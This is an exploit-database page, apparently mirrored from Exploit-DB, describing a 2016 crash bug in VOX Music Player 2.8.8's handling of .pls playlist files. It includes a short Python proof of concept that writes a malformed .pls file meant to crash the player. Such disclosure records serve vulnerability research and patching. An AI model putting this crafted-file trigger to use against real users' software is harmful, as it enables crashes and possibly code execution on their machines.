header-logo
Suggest Exploit
vendor:
Vox Music Player
by:
Antonio Z.
9,3
CVSS
HIGH
Local Crash
119
CWE
Product Name: Vox Music Player
Affected Version From: 2.8.8
Affected Version To: 2.8.8
Patch Exists: NO
Related CWE: N/A
CPE: a:coppertino:vox_music_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OS X 10.10, OS X 10.11, OS X 10.12
2016

VOX Music Player 2.8.8 ‘.pls’ Local Crash PoC

The vulnerability exists due to a boundary error when processing .pls files. A specially crafted .pls file can cause a buffer overflow, resulting in a crash of the application. This can be exploited to execute arbitrary code by enticing a user to open a malicious .pls file.

Mitigation:

No known mitigation is available.
Source

Exploit-DB raw data:

# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
# Date: 10-12-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://coppertino.com/vox/mac/
# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
# Version: 2.8.8
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12

import os

evil = '\x90'
pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'

file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()

Navigation

Suggest Exploit

Services By CQR